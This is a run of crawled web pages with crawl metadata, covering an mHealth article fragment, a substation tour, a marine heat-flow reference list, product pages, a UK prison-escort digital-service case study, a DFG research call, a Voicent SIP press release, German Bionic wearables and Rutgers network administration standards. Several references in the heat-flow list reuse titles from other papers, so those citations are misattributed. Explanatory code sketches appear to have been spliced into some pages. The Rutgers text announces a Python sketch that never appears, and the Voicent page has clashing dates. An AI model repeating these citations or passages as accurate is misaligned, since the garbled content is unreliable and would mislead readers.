accessible, and efficient care. By leveraging the latest trends and innovations, custom mHealth apps are revolutionizing patient engagement, remote monitoring, and treatment delivery, ultimately leading to improved health outcomes and enhanced patient satisfaction. As technology continues to evolve, we can expect custom mHealth apps to play an increasingly integral role in shaping the future of healthcare delivery.
systems_science
https://www.tritonknoll.co.uk/triton-knoll-onshore-substation-tour/
2022-08-13T16:12:55
s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882571959.66/warc/CC-MAIN-20220813142020-20220813172020-00123.warc.gz
0.928217
311
CC-MAIN-2022-33
webtext-fineweb__CC-MAIN-2022-33__0__111971277
en
The Triton Knoll Onshore Substation is complex infrastructure with a very important role to play in ensuring the power generated from the offshore wind farm can be transferred into the national grid and, ultimately, into your homes. Power is generated by the offshore wind turbines and then makes a 110km journey from the offshore site to the onshore substation via export cables. Once at the onshore substation, the electricity is converted into the correct voltage to allow it to be fed into the national grid. There are many different components within the onshore substation each playing a key role in ensuring the power is properly converted but did you know the onshore substation also has a big role to play in the operation and maintenance of the wind farm too? In the video below, our Substations Package Manager, Jacob Hain, takes you on a tour of the Triton Knoll Onshore Substation introducing the key components and detailing their purpose in transporting electricity but also ensuring that we can properly operate the offshore wind turbines. Super Grid Transformer: You may have seen our footage showing the delivery of the Super Grid Transformers to our site, but why are these one of the most important components at the onshore substation? Control Building: Did you know that equipment housed at the onshore substation allows us to monitor the wind turbines located 20 miles offshore from our operations base in Grimsby? Landscaping: How do we ensure that the onshore substation is properly screened and how can the screening encourage wildlife?
systems_science
http://cybersolutionstek.com/
2017-04-25T06:30:49
s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917120187.95/warc/CC-MAIN-20170423031200-00454-ip-10-145-167-34.ec2.internal.warc.gz
0.87677
193
CC-MAIN-2017-17
webtext-fineweb__CC-MAIN-2017-17__0__279275636
en
CST is a company dedicated to business consulting and development of product solutions with a focus on mobile cybersecurity for you and your company. Our patented cybersecurity software authentication products and methods (U.S. Patent No. 8,930,700) enable employees to safely carry their own files and personal medical, financial, legal, identity and education records on their devices while traveling. Emergency personnel can also instantly access the information required to provide care potentially saving your life, corporate data, bank account or identity. The CST product family of RecordVault™ apps allows you to store and retrieve your electronic files and records with our patented RecordSecurity³™ technology incorporating affordable software-based multifactor authentication (3FA). Our business solutions integrate the RecordVault app or technology for Android Phones and Tablets, iPhone, iPad, Windows Phone and Windows Tablet products with your system software plus connectivity to Microsoft HealthVault, iCloud, Dropbox, or other cloud services.
systems_science
https://marine-heatflow.ceoas.oregonstate.edu/references/
2023-10-01T18:40:30
s3://commoncrawl/crawl-data/CC-MAIN-2023-40/segments/1695233510924.74/warc/CC-MAIN-20231001173415-20231001203415-00681.warc.gz
0.71749
1,243
CC-MAIN-2023-40
webtext-fineweb__CC-MAIN-2023-40__0__128739131
en
References and Downloadable Papers and Documentation Davies, F. G. (1980), Review of oceanic and global heat flow estimates, Rev. Geophys. Space Phys., 18, 718-722. Davis, E. E., and C. R. B. Lister (1974), Fundamentals of ridge crest topography, Earth Planet. Sci. Lett., 21, 405-413. Harris, R. N., and D. S. Chapman (2004), Deep-seated oceanic heat flow, heat deficits, and hydrothermal circulation, in Hydrogeology of the Oceanic Lithosphere, edited by E. E. Davis and H. Elderfield, pp. 311-336, Cambridge University Press, Cambridge, UK. Harris, R. N., et al. (2007), The future of marine heat flow: defining scientific goals and experimental needs for the 21st century, 45 pp, Fort Douglas, Salt Lake City. Parsons, B., and J. G. Sclater (1977), An analysis of the variation of ocean floor bathymetry and heat flow with age, J. Geophys. Res., 82, 803-829. Pollack, H. N., S. J. Hurter, and J. R. Johnson (1993), An analysis of the variation of ocean floor bathymetry and heat flow with age, Rev. Geophys., 31(3), 267-280. Sclater, J. G., C. Jaupart, and D. Galson (1980), The heat flow through oceanic and continental crust and the heat loss of the Earth, Rev. Geophys. Space Phys., 18, 269-311. Stein, C., and S. Stein (1994), The heat flow through oceanic and continental crust and the heat loss of the Earth, J. Geophys. Res., 99, 3081-3095. Stein, C. A., S. Stein, and A. M. Pelayo (1995), The heat flow through oceanic and continental crust and the heat loss of the Earth, in Seafloor Hydrothermal Systems: Physical, Chemical, Biological and Geological Interactions, edited by S. E. Humphris, et al., pp. 425-445, American Geophysical Union, Washington, D. C. Stein, C. A., and R. P. Von Herzen (2001), The heat flow through oceanic and continental crust and the heat loss of the Earth, in Encyclopedia of Ocean Sciences, eds. Steele, J., Thorpe, S., and K. Turekian, Academic Press LTD, London, 1149-1157. Von Herzen, R. P. (2004), Geothermal evidence for continuing hydrothermal circulation in older (>60 Ma) ocean crust, in Hydrogeology of the Oceanic Lithosphere, edited by E. E. Davis and H. Elderfield, pp. 414-450, Cambridge University Press, Cambridge, UK. Davis, E. E. (1988), Oceanic heat-flow density, in Handbook of terrestrial heat-flow density determination, edited by R. Haenel, et al., pp. 223-260, Kluwer, Amsterdam. Hartmann, A., and H. Villinger (2002), Inversion of marine heat flow measurements by expansion of the temperature decay function, Geophys. J. Int., 148(3), 628-636. Hutchinson, I. (1985), The effects of sedimentation and compaction on oceanic heat flow, Geophys. J. R. astr. Soc., 82, 439-459. Hutnak, M., and A. T. Fisher (2007), The influence of sedimentation, local and regional hydrothermal circulation, and thermal rebound on measurements of heat flux from young seafloor, J. Geophys. Res., 112, B12101, doi:10.1029/2007JB005022. Hyndman, R. D., et al. (1979), The measurement of marine geothermal heat flow by a multipenetration probe with digital acoustic telemetry and in situ conductivity, Mar. Geophys. Res., 4, 181-205. Langseth, M. G. (1965), Techniques of measuring heat flow through the ocean floor, in Terrestrial Heat Flow, edited by W. H. K. Lee, pp. 58-77, Am. Geophys. Union, Washington, DC. Lister, C. R. B. (1979), The pulse-probe method of conductivity measurement, Geophys. J. R. astr. Soc., 57, 451-461. Pfender M., and H. Villinger (2002), Miniaturized data loggers for deep sea sediment temperature gradient measurements, Mar. Geol., 186, 557-570. Stein, J. S., and A. T. 
Fisher (2001), Multiple scales of hydrothermal circulation in Middle Valley, northern Juan de Fuca Ridge: physical constraints and geologic models, J. Geophys. Res., 106(B5), 8563-8580. Villinger, H., and E. E. Davis (1987), A new reduction algorithm for marine heat-flow measurements, J. Geophys. Res., 92, 12,846-12,856. Von Herzen, R. P., and A. E. Maxwell (1959), The measurement of thermal conductivity of deep-sea sediments by a needle probe method, J. Geophys. Res., 64, 1557-1563. Woodside, W., and J. Messmer (1961), Thermal conductivity of porous media, J. App. Phys., 32, 1688-1706.
systems_science
http://elgressy.com/list.asp?categoryId=312
2019-05-20T12:39:38
s3://commoncrawl/crawl-data/CC-MAIN-2019-22/segments/1558232255944.3/warc/CC-MAIN-20190520121941-20190520143941-00060.warc.gz
0.845047
411
CC-MAIN-2019-22
webtext-fineweb__CC-MAIN-2019-22__0__168106831
en
Guldager Electrolysis System - Corrosion Protection
Prevention and Correction
The Guldager Electrolysis System both prevents corrosion and works to cure the effects of corrosion already present in the system. It is effective in water tanks and all the pipes leading in and out of the system, whether galvanized, plastic or copper. The system can be installed in hot and cold water systems.
Off-the-Shelf System
The Guldager Electrolysis System connects externally to the water system and requires no complicated installation procedures or alterations to your existing system. This represents a significant saving in installation and maintenance costs.
Guldager Electrolysis - One System, Multiple Benefits
The electrolysis process is free of harmful chemicals and is harmless to the environment and humans.
Safe drinking water
The Guldager System does not adversely affect drinking water quality or taste. The Guldager System has low energy needs and low water consumption rates.
Prevents damage and blockage
By eliminating scale buildup and corrosion, the Guldager System helps prevent pipe and water tank damage as well as pipe blockages.
Automatic and controlled
The system is fully automatic and provides complete control over water quality.
Extended life span
The Guldager System extends the life span of hot and cold water systems in both the industrial and private sectors.
Low installation costs
Because the Guldager System is installed externally to your existing system, installation is a relatively easy and cost-efficient process.
Guldager - The Electrolysis Process
Electrolysis, using innovative, patented technology, prevents scaling. A combination of a constant direct current and an aluminum electrode releases trace elements of harmless aluminum into the water. These trace elements are distributed throughout the system and build up a uniform protective layer on all internal surfaces. This process occurs even at water temperatures above 60 °C. This layer protects the system from the effects of corrosion, prevents the spread of corrosion already present and prevents scale build-up.
systems_science
https://www.mccuecontracting.com/project/539/
2023-12-06T20:54:46
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100603.33/warc/CC-MAIN-20231206194439-20231206224439-00456.warc.gz
0.920884
191
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__11673001
en
We installed a Liquid Boot® vapour intrusion barrier system for BC Hydro’s Big Bend Substation, located in Burnaby, British Columbia. The purpose of the system is to prevent any methane gas accumulating in the subsurface under the building foundation slab from entering the building envelope. The project involved the installation of a geotextile liner over a layer of venting gravel located below the foundation slab of the building. Liquid Boot liquid membrane was then spray applied over an area of 2,800 ft2 to a thickness of 60 mils. The liner system accommodated over two dozen separate penetrations, including vapour management piping, electrical conduit, and grounding cables. McCue performed smoke testing of the liner, as well as general inspection services, to ensure the integrity of the system. As a final measure, a layer of protective course geotextile was installed over the Liquid Boot membrane to prevent potential damage to the liner system.
systems_science
https://andrew-millar.co.uk/hmpps.html
2022-01-27T17:20:39
s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320305277.88/warc/CC-MAIN-20220127163150-20220127193150-00547.warc.gz
0.95249
986
CC-MAIN-2022-05
webtext-fineweb__CC-MAIN-2022-05__0__223507187
en
Her Majesty's Prison and Probation Service
Prisoner Escort and Custody Services enables users to request moves from police stations, prisons, custody suites and courts, in order to move people within the criminal justice system between these establishments. Since 1994, the contract has been outsourced – in 2017, the contract undertook over 622,000 moves coming from police custody suites, prisons and courts across the country, covering around 10.5 million miles. I was hired to help with the digital transformation of the fourth generation of this service in 2019, leading the design across the entire programme of work over multiple streams. The revised contracts for the Prisoner Escort and Custody Service (PECS) built on the current arrangements within England and Wales - introducing an updated fleet of escort vehicles with enhanced safety and security features, and an innovative digital platform which provides real-time data on the location of detainees and prisoners who are being moved.
During development of MoJ’s ‘Book a Secure Move’, we utilised dual-track agile – extending the agile process to include discovery, running parallel to delivery. We benefited from continuous learning – a wealth of learning opportunities from qualitative feedback and quantitative data to make evidence-based decisions. We experienced better outcomes with less waste – through a better understanding of our users we delivered only products that were desirable, viable and feasible, while also being bolder when exploring ideas.
To understand the existing space, we conducted research with all users across the criminal justice system – including police, courts and prisons – running a mixture of initiatives, including quantitative and qualitative methods, such as journey mapping, focus groups, interviews, usability testing, and surveys. We aligned the needs of users with the wider goals within the contract, alongside addressing the technical complexities we had identified.
From planning a move to calculating its price after completion, a considerable admin burden is placed upon users due to inefficient ways of working - entailing a mix of tools, manual processes and disjointed channels. This affects information relevant to moves (for example, risk and health), which is often out of date or missing as users are required to access and maintain separate systems, using inconsistent formats and local ways of working. This leads to delays and errors in transportation, and heightened risk for people being moved and those they come into contact with. In addition, Assurance and Finance teams need to manually complete checks and assure moves from the previous month (approximately 5,000 moves).
We engaged with a wide range of stakeholders and users over multiple departments and at multiple levels across the criminal justice system – including prisons, police, courts, the NHS and third-party suppliers at portfolio, programme and service level. We collaborated to address challenges and develop solutions through creative workshops which I designed and facilitated – ensuring the service was desirable for users, viable for the business and technically feasible. Solutions were prototyped for research with real users in real environments. Research findings were synthesised to identify trends and insights, which were shared and prioritised with the wider team to inform the next iteration. We quickly adapted during the pandemic to minimise disruption, switching to remote working.
Once live, analytics were used to help further refine our service. For example, we identified a serious performance problem at the same time every week – further investigation revealed the cause to be multiple people downloading reports simultaneously, which, combined with database performance issues, was affecting the site. I worked with the tech leads to address this by optimising the database queries and changing the design of the page to reduce load time.
From the outset, we developed ‘Book a Secure Move’ to GDS Service Standards and to meet accessibility and assisted digital needs. We implemented WCAG 2.1 guidelines and conducted research with users with specific needs (where possible) to ensure the service could be used by those with visual, hearing, cognitive or physical impairments.
As of today, the ‘Book a Secure Move’ service is rolled out across every police custody suite, prison, and youth establishment in England and Wales. It is used daily by over 20,000 users across the criminal justice system, in over 700 establishments, to book over 1,500 moves per day, whether to request moves, to update risk assessments on the service, or to manage capacities in prisons and identify whether any capacity issues need to be addressed. The service has a 95% user satisfaction rating and 97% user engagement.
Suppliers performing moves can process the move requests for individuals (including risk and health information) and plan moves accordingly. They can also manage moves and record events against moves which can be seen by receiving establishments. Ministry of Justice employees can monitor moves in progress and access the reporting function to identify how the service is performing. 97% of the moves are now automatically costed, and do not need to be assured by operational teams.
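The weekly reporting bottleneck described above, with many users downloading reports at once and each download triggering expensive database work, is a common pattern. The sketch below shows one generic mitigation: caching a generated report for a short window so concurrent downloads reuse it. This is an assumed illustration of the general idea, not the team's actual fix, which involved optimising the database queries and redesigning the page.

```python
# Generic illustration: serve a cached copy of an expensive report for a short
# window so simultaneous downloads do not each hit the database. This is an
# assumed pattern for illustration, not the Book a Secure Move implementation.
import time

CACHE_TTL_SECONDS = 300          # assumed freshness window
_cache = {}                      # report_name -> (generated_at, payload)

def expensive_report_query(report_name):
    # Placeholder for the slow database query / report generation.
    time.sleep(2)
    return f"rows for {report_name}"

def get_report(report_name):
    now = time.time()
    cached = _cache.get(report_name)
    if cached and now - cached[0] < CACHE_TTL_SECONDS:
        return cached[1]                      # reuse the recent result
    payload = expensive_report_query(report_name)
    _cache[report_name] = (now, payload)
    return payload

print(get_report("weekly-moves"))   # slow: generates and caches
print(get_report("weekly-moves"))   # fast: served from cache
```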
systems_science
http://projects.aifb.kit.edu/effalg/oc/inhalte/antragstellung.php
2022-09-30T19:41:01
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00720.warc.gz
0.876427
987
CC-MAIN-2022-40
webtext-fineweb__CC-MAIN-2022-40__0__58214156
en
The senate of the German Research Foundation (DFG) has approved a priority program (SPP) about "Organic Computing", which started its first phase July 1st, 2005. This call for proposals concerns the third and final phase of the priority program from July 1st, 2009 to June 30, 2011. The mission of Organic Computing is to tame complexity in technical systems by providing appropriate degrees of freedom for self-organized behaviour adapting to changing requirements of the execution environment, in particular with respect to human needs. According to this vision an organic computer system should be aware of its own capabilities, the requirements of the environment, and it should be equipped with a number of "self-x" properties allowing for the anticipated adaptiveness and for a reduction in the complexity of system management. These self-x properties include self-organisation, self-configuration, self-optimization, self-healing, self-protection and self-explanation. To achieve these ambitious goals new methods, new techniques, and new system architectures have to be developed. Their potential and relevance should be demonstrated with respect to demanding application scenarios. The major objectives of this priority program are grouped into the following topical areas: Controlled self-organisation in technical systems Insights about the behaviour of natural and artificial complex systems shall be used to open up the necessary degrees of freedom for self-organized behaviour of technical systems. This requires projects on the theory of complex technical systems, investigating the possibilities to establish goal-oriented emergent processes and, in particular, looking at the problems of security and stability of self-organized technical systems. Methods are needed that allow for self-organized behaviour while directing a system towards desired emergent behaviour, and to detect and prevent undesirable Technologies for Organic Computing New base technologies are needed to support the technical utilisation of the principles of self-organisation in the implementation of organic computer systems. Complete organic computer systems will need adequate (multi-level) system architectures. Therefore, an essential objective is to build up a versatile toolbox containing balanced concepts, methods, and tools for the design and implementation of organic computer systems. Furthermore, an evaluation of the effectiveness and efficiency of organic computer systems will require new methods and metrics for an appropriate system analysis. The third phase of the priority program will shift its emphasis from research on fundamental insights into the principles of self-organisation to the design and experimental investigation of generic concepts for architectures and tools for realizing organic computer systems. Research proposals must clearly identify the aspects of self-organisation. The priority program does not allow for explicit design of application systems. But it will be indispensable to evaluate the anticipated methods and technologies of OC with respect to relevant technical application areas. In particular, at the end of this priority program, the major achievements of the research projects with respect to the engineering of organic computer systems should be clearly visible. 
Proposals (in English AND in compliance with the official guidelines and proposal preparation instructions of DFG [RTF]) for the third and final phase of the program must be available in quintuplicate (attachments in triplicate, everything punched, but not stapled) with the keyword "SPP 1183 - Organic Computing" in the office of the DFG by November 21, 2008 (deadline extended to December 5, 2008). An additional copy of the proposal in PDF format must be sent by email to the coordinator of the project, Prof. Dr. Hartmut Schmeck. The cover sheet (template below) has to be sent by email.
Questions about Organic Computing are answered by the coordinator of the SPP:
Prof. Dr. Hartmut Schmeck, Institut AIFB, Universität Karlsruhe (TH) / Karlsruhe Institute of Technology (KIT), email: , phone: +49 (721) 608 42 42.
For questions on setting up the proposal please contact:
Valentina Damerow, email: , phone: +49 (228) 885 24 99.
Call for Proposals of SPP 1183 "Organic Computing" Phase 3 (2009-2011) on the DFG Website
The Cover Sheet Template for Project Proposals:
Official Guidelines and Proposal Preparation Instructions with Supplementary Instructions from DFG:
systems_science
https://voicent.com/pr/pr_7.0.2_sip_voip.php
2023-03-28T09:42:09
s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948817.15/warc/CC-MAIN-20230328073515-20230328103515-00085.warc.gz
0.90862
680
CC-MAIN-2023-14
webtext-fineweb__CC-MAIN-2023-14__0__240752105
en
Dec 5, 2004
VOICENT PRODUCTS NOW SUPPORT SIP BASED VOIP SERVICE
Santa Clara, Calif. - July 10, 2009 - Voicent Communications, Inc (http://voicent.com), a provider of comprehensive business phone software, has announced the support for SIP (Session Initiation Protocol) among all its current product lines, including: IVR Studio, Flex PBX, Agent Dialer (predictive dialer and force dialer), BroadcastByPhone Autodialer, and Voicent VoiceXML Gateway. With SIP support, customers can now manage and automate their incoming phone calls and outbound campaigns without any telephony hardware, making Voicent software easy to set up and maintain, and making the Voicent solution ideal for large enterprises and small businesses alike. Session Initiation Protocol (SIP) is an emerging standard for Voice over Internet Protocol (VOIP). It allows enhanced voice services to high speed internet users, over DSL, ADSL or cable modem. Being an international standard that is fast becoming mainstream, SIP allows businesses to achieve huge savings in their telephone operating cost - made possible by more competition among VOIP service providers. For enterprises that have already deployed a SIP-based solution, such as a SIP-compatible PBX system, Voicent software can be easily configured to use the existing infrastructure. For example, a customer can create a powerful IVR application that is fully integrated with the existing customer database and company website, by simply using point-n-click operations in the intuitive development environment of Voicent IVR Studio. For businesses that are adopting SIP and VOIP technology, Voicent provides a complete solution for managing both inbound and outbound phone calls. Voicent software can be readily configured to work with any SIP-based service provider. "Nowadays, there is absolutely no need for a business to purchase a traditional phone system", said Jeff Larson, vice president of product development, Voicent. "By adopting VOIP, which utilizes an existing internet connection for phone calls, a business can avoid costly hardware installation and maintenance, and in addition, enjoy low nation-wide calling rates. With SIP support, Voicent products are well positioned to provide our customers all the necessary tools to operate in this new and exciting environment."
Pricing and Availability
SIP support is available in release 7.0.2, currently in beta. Besides SIP, Voicent software also supports Skype and traditional phone lines. A trial version can be downloaded from the Voicent website (http://voicent.com/download). Customers who purchase now can upgrade to any future 7.x production release for free. Products can be purchased from the Voicent online store (http://voicent.com/store), and prices start at $299.
What We Offer
Voicent gives you the tools to connect and engage with customers. We offer predictive dialers, auto dialers, marketing automation, inbound IVR handling, phone and text/SMS surveys, bulk SMS, email marketing, and more. Whether you're a small business owner, hospital, nonprofit, government agency, or a global call center, we're confident that our award-winning, feature-rich software will help you connect, engage, and succeed.
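The release describes SIP only at a high level. As a rough, generic illustration of what SIP signalling looks like on the wire (this is not Voicent-specific and is not taken from the product), the sketch below hand-builds a minimal SIP OPTIONS request in the style of RFC 3261 and sends it over UDP. The server name, user and local address are placeholders, and real applications would normally use a full SIP stack rather than hand-built messages.

import socket
import uuid

SERVER = "sip.example.com"   # placeholder SIP provider / PBX
PORT = 5060                  # default SIP UDP port
LOCAL_IP = "192.0.2.10"      # placeholder local address

def build_options(call_id: str) -> bytes:
    branch = "z9hG4bK" + uuid.uuid4().hex[:12]        # per-transaction branch id
    lines = [
        f"OPTIONS sip:{SERVER} SIP/2.0",
        f"Via: SIP/2.0/UDP {LOCAL_IP}:{PORT};branch={branch}",
        "Max-Forwards: 70",
        f"From: <sip:probe@{SERVER}>;tag={uuid.uuid4().hex[:8]}",
        f"To: <sip:{SERVER}>",
        f"Call-ID: {call_id}",
        "CSeq: 1 OPTIONS",
        f"Contact: <sip:probe@{LOCAL_IP}:{PORT}>",
        "Content-Length: 0",
        "", "",                                       # blank line ends the headers
    ]
    return "\r\n".join(lines).encode()

if __name__ == "__main__":
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(3)
    sock.sendto(build_options(uuid.uuid4().hex), (SERVER, PORT))
    try:
        reply, _ = sock.recvfrom(4096)
        print(reply.decode(errors="replace").splitlines()[0])  # e.g. "SIP/2.0 200 OK"
    except socket.timeout:
        print("no response (placeholder host, or the server filtered the probe)")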
systems_science
https://orthexo.de/en/german-bionic-presenting-three-new-products-solutions-apogee-smart-safety-and-dashboard/
2023-02-08T00:04:06
s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500664.85/warc/CC-MAIN-20230207233330-20230208023330-00531.warc.gz
0.941228
536
CC-MAIN-2023-06
webtext-fineweb__CC-MAIN-2023-06__0__182377425
en
Apogee Power Suit: intelligent robotic exoskeleton for the working world
The compellingly designed, AI-based Apogee is the latest generation of intelligent robotic wearable tools from German Bionic. The exoskeleton is even lighter and more comfortable than its predecessors and opens up additional areas of application. The dust- and waterproof power suit ensures greater safety in the workplace by relieving the lower back of up to 30 kilograms during every lifting movement and minimizing fatigue with active walking support. The Apogee can be easily integrated into work processes and is immediately effective wherever heavy lifting and carrying are part of everyday work, such as in logistics, production or even healthcare.
Smart Safety Vest: ergonomic protection for all - as simple as possible
German Bionic's Smart SafetyVest combines cutting-edge sensor technology and AI to enable data-based, ergonomic analyses, evaluations and recommendations for action at the click of a mouse or the tap of a finger. In addition to individual workplace analyses, the wearable can identify ergonomic risks as well as potential for improvement and thus reduce signs of fatigue and injuries, which can sometimes lead to high levels of sick leave and absenteeism - regardless of the type of activity performed.
German Bionic IO: the first ergonomics data platform for the workplace
At the heart of the innovations presented at CES 2023 is the pioneering cloud-based platform German Bionic IO. It makes occupational safety and health protection not only measurable, but also vivid. The system analyzes the data collected by Apogee, Cray X and Smart SafetyVest, continuously learns through machine learning and AI, and improves the respective safety measures with every movement of the wearer. In this way, the respective risks, trends and process optimizations can be determined, tailored to the work environment and the device used. With the Smart Safety Companion ergonomics early warning system, which indicates, for example, incorrect posture, incorrect lifting or excessive loads, the German Bionic IO platform offers comprehensive monitoring and reporting functions as well as individualized recommendations for action based on real, practice-relevant real-time data.
"Our new wearables now give hardworking people the right tools to perform their jobs more safely and therefore more sustainably. With our two new ergonomic wearables Apogee and Smart SafetyVest, as well as our well-proven exoskeleton Cray X, we can now provide the right support for almost every company and every work environment where manual work is performed, and with the German Bionic IO data platform, a powerful analysis tool," says Norma Steller, CPO of German Bionic.
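The announcement gives no technical detail about how the Smart Safety Companion generates its warnings. Purely as a toy illustration of the kind of threshold-based ergonomics alert it describes, the sketch below (Python) flags lifts whose estimated load or trunk angle exceeds a limit; the data format, field names and limits are all invented for the example.

from dataclasses import dataclass

@dataclass
class LiftEvent:
    worker_id: str
    load_kg: float           # estimated load handled in the lift (invented field)
    trunk_angle_deg: float   # estimated forward bend during the lift (invented field)

MAX_LOAD_KG = 25.0
MAX_TRUNK_ANGLE_DEG = 60.0

def ergonomic_warnings(events):
    """Yield human-readable warnings for risky lifts."""
    for e in events:
        if e.load_kg > MAX_LOAD_KG:
            yield f"{e.worker_id}: load {e.load_kg:.0f} kg exceeds the {MAX_LOAD_KG:.0f} kg limit"
        if e.trunk_angle_deg > MAX_TRUNK_ANGLE_DEG:
            yield f"{e.worker_id}: forward bend of {e.trunk_angle_deg:.0f} degrees suggests incorrect lifting posture"

if __name__ == "__main__":
    sample = [
        LiftEvent("w-01", 18.0, 35.0),
        LiftEvent("w-02", 31.5, 72.0),   # triggers both warnings
    ]
    for warning in ergonomic_warnings(sample):
        print(warning)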
systems_science
https://oit.rutgers.edu/standards-for-management-of-systems
2019-06-25T23:52:04
s3://commoncrawl/crawl-data/CC-MAIN-2019-26/segments/1560627999964.8/warc/CC-MAIN-20190625233231-20190626015231-00210.warc.gz
0.94904
3,202
CC-MAIN-2019-26
webtext-fineweb__CC-MAIN-2019-26__0__212022923
en
The Internet is an extremely valuable tool. Unfortunately its use carries with it corresponding responsibilities. There are a number of people, both at Rutgers and throughout the world, who attempt to use the Internet in ways that are abusive or that interfere with operation of other systems. All organizations that attach to the Internet are expected to adopt policies to deal with this situation. This document outlines the policies that apply to individual Rutgers departments, organizational units, and system administrators. This document will use the term "department" to refer to any unit within the University that operates computer systems. This includes both units with central computing support staff and those where computing support is done more informally, including units in which individuals are responsible for the computer on their own desk. The primary policy document for computing at Rutgers is the Acceptable Use Policy and guidelines. See the Computing Policies page for these documents. Under the Acceptable Use Policy, system administrators have the "responsibility of ensuring the integrity, confidentiality, and availability of the resources they are managing." This document outlines some of the implications of that. See the RUSECURE web page for additional information about relevant policies and laws, as well as best practices in the areas of information protection and security. The most basic requirement for responding to problems is this: We must be able to identify a responsible person to deal with problems for all activities on the Internet. That has the following implications:
Allocation of IP addresses
[This section applies to subnets that are intended to communicate with the rest of Rutgers and the Internet. It is possible to set up a subnet that is not connected with any other network. In this case the procedures described here are technically not applicable. However in order to avoid confusion, we strongly recommend contacting the Rutgers Hostmaster to request an official range of IP addresses even for disconnected networks.] Typically reports of problems are identified by the IP address of the source. Thus we need some way to identify a contact who can pursue problems for any IP address at Rutgers. This is done through a process of assigning and registering IP addresses. There are two levels of address assignment/registration. The first is for a subnet. A subnet is a specific physical network connected to a single router port. (Technically, it is a "broadcast domain".) Generally there will be one or more subnets per department. Each subnet has a range of IP addresses allocated to it. This range is assigned by the Rutgers Hostmaster, [email protected]. As part of the process for address assignment, the department must designate one or more "Network Liaisons." The Network Liaisons will be the contact for any questions about the network. This specifically includes problems caused by computers on the network. The Network Liaison will be expected to arrange for problems to be dealt with, and to report back on its disposition. (However the initial responsibility for dealing with problems rests with the person designated as the RP. See below.) The second level of address assignment is individual IP addresses. In order to communicate with the rest of Rutgers and the Internet, a computer must be given an IP address. There are several ways to do this. The simplest approach is to assign a permanent address to each system.
However it is also possible to use software that allocates addresses dynamically. In any case, the IP address assigned to a computer must be within the range authorized for the subnet to which it is connected. The most common procedure is for IP addresses to be assigned by and registered with the Rutgers Hostmaster. This may be done by contacting the hostmaster at [email protected]. The hostmaster will register addresses on request. They can also set up departmental staff to be able to register addresses themselves in the hostmaster's database, using software supplied by the hostmaster. This is recommended for departments that regularly add or change systems. It is also possible for the Hostmaster to delegate responsibility for address allocation to a department. In this case the department is required to maintain records so that it can identify what computer is using any given IP address. If the department has chosen to assign addresses dynamically, records showing how addresses were in use should be kept for at least 60 days. It is important to make sure that you contact Hostmaster to get a registered IP address before using a computer on the network, unless responsibility for address allocation has been delegated to your department. Whether addresses are allocated by the Hostmaster or the department, it is expected that each address will have a description in the Domain Name System (DNS). These descriptions are created by the Hostmaster as part of assigning an address. Most software that departments would use to maintain addresses will provide DNS data for the department. (As part of delegating responsibility for address maintenance to a department, Hostmaster will arrange to link that department's DNS software into the University's system.) All services provided by OIT assume that addresses are registered with DNS. If a system does not have a DNS entry, various services (e.g. email) at Rutgers and elsewhere will not work. It is important for each unit to consider what contacts should be used to report abuse and other network problems. The DNS system can maintain an entry called the "Responsible Person" (RP) for each IP address. Normally departments are asked to specify the RP for each address that is assigned. Where responsibility for address maintenance has been delegated to a department, the department should create RP entries for all hosts in its DNS system. If RP entries do not exist for a given address, OIT staff will contact the Network Liaison. However you should be aware that Network Liaisons are not currently visible outside Rutgers, and have limited visibility even within Rutgers. Thus most network managers will expect to find RP records for every host. They may take unpredictable actions if they are having problems from a host that does not have an RP record. Departments are responsible for keeping both Responsible Person and Network Liaison information up to date as staff and systems change. The University is currently very near to running out of IP addresses, at least in the pool of addresses that are visible to the Internet. In order to allow for new systems, OIT needs to be able to reallocate addresses that are no longer in use. Thus OIT will poll Network Liaisons on a regular basis to verify that the address ranges assigned to them are still in use.
Logging on individual systems
System administrators need to think about how they would deal with reports of problems from their system.
In many cases they will need to keep logs that will allow them to tie Internet activities to identifiable people. For many systems, this is not a problem: the system is located in an individual's office, and is used primarily by that person. In such cases, that individual would normally be responsible for all use of the system, whether their own or others that they permit to use the system. For multiuser systems, or systems in public areas, there must be some mechanism for identifying users. One common approach is that all users must log in with a username and password. Where this is not possible, less formal mechanisms may be used. For example, some public labs check ID cards of users and keep a log of usage by system. Every system for which Internet access is possible must have good enough mechanisms that the system administrator can deal with any reports of problems. Logs must be kept for at least 60 days. (This interval may be adjusted from time to time by the Information Protection Division, based on experience in handling problems.) Information from the logs must be made available to staff assigned to the Information Protection Division if it is needed to investigate network security problems or abuse. Staff should also give thought to a maximum lifetime for logs. Be aware that any log is subject to subpoena or other legal process. This may be burdensome if logs are kept for a long period of time. Departments may be asked to describe their logging procedures as part of getting authorization for a subnet to be enabled for access to the Internet. No mechanism for identifying users is perfect. However departments need a place to start investigations when a problem occurs.
Administration of Individual Systems
There are currently active attacks being made throughout the Internet. Any system connected to RUnet can expect to be the subject of a variety of attacks. In many cases the goal of an attacker is to compromise a system, and then use that system as a base for attacks on other systems. All systems must have someone who plays the role of system administrator. (In many cases the owner of the system is effectively acting as system administrator.) The system administrator is responsible for software installation and configuration, as well as monitoring the system for inappropriate use, and use of "best practices" in protecting their system from compromise. These responsibilities also apply to individuals connecting systems at home or elsewhere to the Rutgers network via dialups, wireless networks, publicly accessible ports, VPN's, etc. One of the major responsibilities of the system administrator is to keep software up to date. Most vendors issue security-related patches on a regular basis. Systems that do not install these patches are much more likely to be compromised. Rutgers University has licensed anti-virus software on a site-wide basis. For system architectures where viruses are common, system administrators are expected to install anti-virus software and keep it up to date. System administrators are encouraged to take additional security precautions, such as use of a firewall or host-based firewall software. OIT has made arrangements to purchase one common host-based firewall product (ZoneAlarm) at a substantial discount. Note that the Acceptable Use Policy and Guidelines charges computing and information technology providers throughout the University with preserving the integrity and security of resources.
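The 60-day retention floor described above is easy to automate. The sketch below (Python) is an illustrative housekeeping job, not a Rutgers-provided tool: it prunes log files once they are older than the retention window, which also addresses the advice to set a maximum lifetime for logs. The log directory and file pattern are placeholders.

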